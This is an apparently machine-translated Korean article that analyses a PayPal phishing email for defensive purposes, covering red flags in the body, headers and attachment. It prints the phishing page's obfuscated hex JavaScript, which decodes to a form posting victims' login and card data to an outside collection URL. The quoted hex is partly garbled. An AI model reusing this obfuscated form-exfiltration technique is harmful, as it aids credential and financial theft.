모든 사람의 정보가 온라인에있는 오늘날의 세상에서 피싱은 항상 바이러스를 치료할 수 있기 때문에 가장 인기 있고 파괴적인 온라인 공격 중 하나이지만 은행 세부 정보가 도난 당하면 문제가됩니다. 다음은 이러한 공격에 대한 분석입니다.
중요한 것은 단지 귀하의 은행 정보라고 생각하지 마십시오. 결국 누군가 귀하의 계정 로그인을 제어 할 수있는 경우 해당 계정에 포함 된 정보를 알고있을뿐만 아니라 동일한 로그인 정보가 다양한 다른 곳에서 사용될 수 있습니다. 계정. 또한 이메일 계정이 손상되면 다른 모든 비밀번호를 재설정 할 수 있습니다.
따라서 강력하고 다양한 암호를 유지하는 것 외에도 항상 진짜로 가장하는 가짜 이메일을 경계해야합니다. 대부분의 피싱 시도는 아마추어 적이지만 일부는 매우 설득력이 있으므로 표면 수준에서이를 인식하는 방법과 내부에서 작동하는 방법을 이해하는 것이 중요합니다.
이미지 asirap
시야에 무엇이 있는지 조사
대부분의 피싱 시도와 마찬가지로 우리의 예제 이메일은 정상적인 상황에서 경고 할 수있는 PayPal 계정 활동을 "알립니다". 따라서 행동 유도는 생각할 수있는 거의 모든 개인 정보를 제출하여 계정을 확인 / 복원하는 것입니다. 다시 말하지만 이것은 꽤 공식적입니다.
예외는 있지만 거의 모든 피싱 및 사기 이메일은 메시지 자체에 직접 위험 신호로로드됩니다. 텍스트가 설득력이 있더라도 일반적으로 메시지 본문 전체에서 메시지가 합법적이지 않음을 나타내는 많은 실수를 찾을 수 있습니다.
메시지 본문
언뜻보기에 이것은 내가 본 더 나은 피싱 이메일 중 하나입니다. 철자법이나 문법적 실수가 없으며 예상 한대로 말을 읽습니다. 그러나 콘텐츠를 좀 더 자세히 살펴보면 몇 가지 위험 신호를 볼 수 있습니다.
- “Paypal”– 올바른 대소 문자는“PayPal”(대문자 P)입니다. 메시지에서 두 가지 변형이 모두 사용되는 것을 볼 수 있습니다. 회사는 브랜딩에 매우 신중하기 때문에 이와 같은 것이 교정 프로세스를 통과 할 수 있을지 의문입니다.
- "ActiveX 허용"– Paypal 크기의 합법적 인 웹 기반 비즈니스에서 특히 여러 브라우저를 지원할 때 단일 브라우저에서만 작동하는 독점 구성 요소를 사용하는 것을 몇 번이나 보셨습니까? 물론, 어딘가에서 어떤 회사에서 그렇게하지만 이것은 위험 신호입니다.
- "안전하게." –이 단어가 나머지 단락 텍스트와 여백에 어떻게 정렬되지 않는지 확인하십시오. 창을 조금 더 늘려도 줄 바꿈이나 간격이 제대로되지 않습니다.
- "페이팔!" – 느낌표 앞의 공백이 어색해 보입니다. 합법적 인 이메일에는 없을 것이라고 확신하는 또 다른 단점이 있습니다.
- "PayPal- 계정 업데이트 Form.pdf.htm"– Paypal이 특히 사이트의 페이지에 링크 할 수있을 때 "PDF"를 첨부하는 이유는 무엇입니까? 또한 HTML 파일을 PDF로 위장하려는 이유는 무엇입니까? 이것은 그들 모두의 가장 큰 붉은 깃발입니다.
메시지 헤더
메시지 헤더를 살펴보면 몇 가지 더 많은 위험 신호가 나타납니다.
- 보낸 사람 주소는 [email protected] .
- 받는 사람 주소가 없습니다. 나는 이것을 비우지 않았으며 단순히 표준 메시지 헤더의 일부가 아닙니다. 일반적으로 귀하의 이름을 가진 회사는 귀하에게 이메일을 개인화합니다.
첨부 파일
첨부 파일을 열면 스타일 정보가 누락되어 레이아웃이 올바르지 않음을 즉시 확인할 수 있습니다. 다시 말하지만, PayPal이 단순히 사이트에 링크를 제공 할 수 있는데 왜 HTML 양식을 이메일로 보낼까요?
노트 : 이를 위해 Gmail에 내장 된 HTML 첨부 파일 뷰어를 사용했지만 사기꾼이 보낸 첨부 파일을 열지 않는 것이 좋습니다. 못. 이제까지. 그들은 종종 계정 정보를 훔치기 위해 PC에 트로이 목마를 설치하는 익스플로잇을 포함합니다.
조금 더 아래로 스크롤하면이 양식이 PayPal 로그인 정보뿐만 아니라 은행 및 신용 카드 정보도 요청한다는 것을 알 수 있습니다. 일부 이미지가 깨졌습니다.
이 피싱 시도가 한 번의 급습으로 모든 것을 쫓는 것은 분명합니다.
기술적 분석
이것이 피싱 시도라는 것이 명백한 것을 근거로하여 꽤 분명해야하지만, 이제 우리는 이메일의 기술적 구성을 분해하고 우리가 찾을 수있는 것을 볼 것입니다.
첨부 파일의 정보
가장 먼저 살펴볼 것은 첨부 파일 양식의 HTML 소스로, 가짜 사이트에 데이터를 제출하는 것입니다.
소스를 빠르게 볼 때 모든 링크는 합법적 인 "paypal.com"또는 "paypalobjects.com"을 가리 키므로 유효한 것처럼 보입니다.
이제 Firefox가 페이지에서 수집하는 몇 가지 기본 페이지 정보를 살펴 보겠습니다.
보시다시피 일부 그래픽은 합법적 인 PayPal 도메인 대신 "blessedtobe.com", "goodhealthpharmacy.com"및 "pic-upload.de"도메인에서 가져옵니다.
이메일 헤더의 정보
다음으로 원시 이메일 메시지 헤더를 살펴 보겠습니다. Gmail은 메시지의 원본 표시 메뉴 옵션을 통해이를 사용할 수 있습니다.
원본 메시지의 헤더 정보를 보면이 메시지가 Outlook Express 6을 사용하여 작성되었음을 알 수 있습니다. PayPal에 오래된 이메일 클라이언트를 통해 이러한 메시지를 각각 수동으로 보내는 직원이있는 것 같습니다.
이제 라우팅 정보를 살펴보면 발신자와 중계 메일 서버의 IP 주소를 확인할 수 있습니다.
"사용자"IP 주소는 원래 보낸 사람입니다. IP 정보에 대한 빠른 조회를 수행하면 보내는 IP가 독일에 있음을 알 수 있습니다.
중계 메일 서버 (mail.itak.at)의 IP 주소를 살펴보면 이것이 오스트리아에있는 ISP임을 알 수 있습니다. PayPal이이 작업을 쉽게 처리 할 수있는 대규모 서버 팜을 보유하고있을 때 오스트리아 기반 ISP를 통해 직접 이메일을 라우팅하는 것은 의심 스럽습니다.
데이터는 어디로 이동합니까?
따라서 이것이 피싱 이메일임을 분명히 확인하고 메시지의 출처에 대한 정보를 수집했지만 데이터가 전송되는 위치는 어떻습니까?
이를 확인하려면 먼저 데스크톱에 HTM 첨부 파일을 저장하고 텍스트 편집기에서 열어야합니다. 그것을 스크롤하면 의심스러운 Javascript 블록에 도달하는 경우를 제외하고 모든 것이 순서대로 보입니다.
마지막 자바 스크립트 블록의 전체 소스를 살펴보면 다음과 같습니다.
<script language =”JavaScript”type =”text / javascript”>
// 저작권 © 2005 Voormedia-WWW.VOORMEDIA.COM
var i, y, x =”3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f; 6262732f646706223y”;
</ script>
자바 스크립트 블록에 포함 된 임의의 문자와 숫자로 이루어진 큰 뒤죽박죽 된 문자열을 볼 때마다 일반적으로 의심스러운 것입니다. 코드를 보면 변수 "x"가이 큰 문자열로 설정된 다음 변수 "y"로 디코딩됩니다. 그러면 변수 "y"의 최종 결과가 HTML로 문서에 기록됩니다.
큰 문자열은 숫자 0-9와 문자 a-f로 구성되어 있으므로 간단한 ASCII에서 16 진수로 변환하여 인코딩 할 가능성이 높습니다.
3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f2f7777772e64657870626f737267327f2e64657870626f737267327f2e646578706f73726732742f73742220616374696f6e3d22687474703a2f2f2f7777772e646578706f737267327f57e646578703a2f2f2f7777772f57706
번역 :
<form name =”main”id =”main”method =”post”action =”http://www.dexposure.net/bbs/data/verify.php”>
이것이 PayPal이 아닌 악성 사이트로 결과를 보내는 유효한 HTML 양식 태그로 디코딩되는 것은 우연이 아닙니다.
또한 양식의 HTML 소스를 볼 때이 양식 태그는 Javascript를 통해 동적으로 생성되기 때문에 표시되지 않습니다. 이것은 텍스트 편집기에서 직접 첨부 파일을 여는 대신 누군가가 첨부 파일의 생성 된 소스 (앞에서했던 것처럼)를보기 만하면 HTML이 실제로 수행하는 작업을 숨기는 영리한 방법입니다.
문제가되는 사이트에서 빠른 whois를 실행하면 인기있는 웹 호스트 인 1and1에서 호스팅되는 도메인임을 알 수 있습니다.
눈에 띄는 것은 도메인이 읽을 수있는 이름 (“dfh3sjhskjhw.net”과는 반대로)을 사용하고 도메인이 4 년 동안 등록되었다는 것입니다. 이 때문에이 도메인이 해킹되어이 피싱 시도에서 폰으로 사용되었다고 생각합니다.
냉소주의는 좋은 방어입니다
온라인에서 안전을 유지하는 데있어서 냉소주의를 조금이라도 갖는 것은 결코 아프지 않습니다.
예제 이메일에 더 많은 위험 신호가 있다고 확신하지만 위에서 지적한 것은 몇 분의 조사 후 확인한 지표입니다. 가설 적으로 이메일의 표면 수준이 합법적 인 상대를 100 % 모방 한 경우 기술적 분석은 여전히 그 진정한 성격을 드러 낼 것입니다. 이것이 당신이 볼 수있는 것과 볼 수없는 것을 모두 검토 할 수있는 것이 중요한 이유입니다.
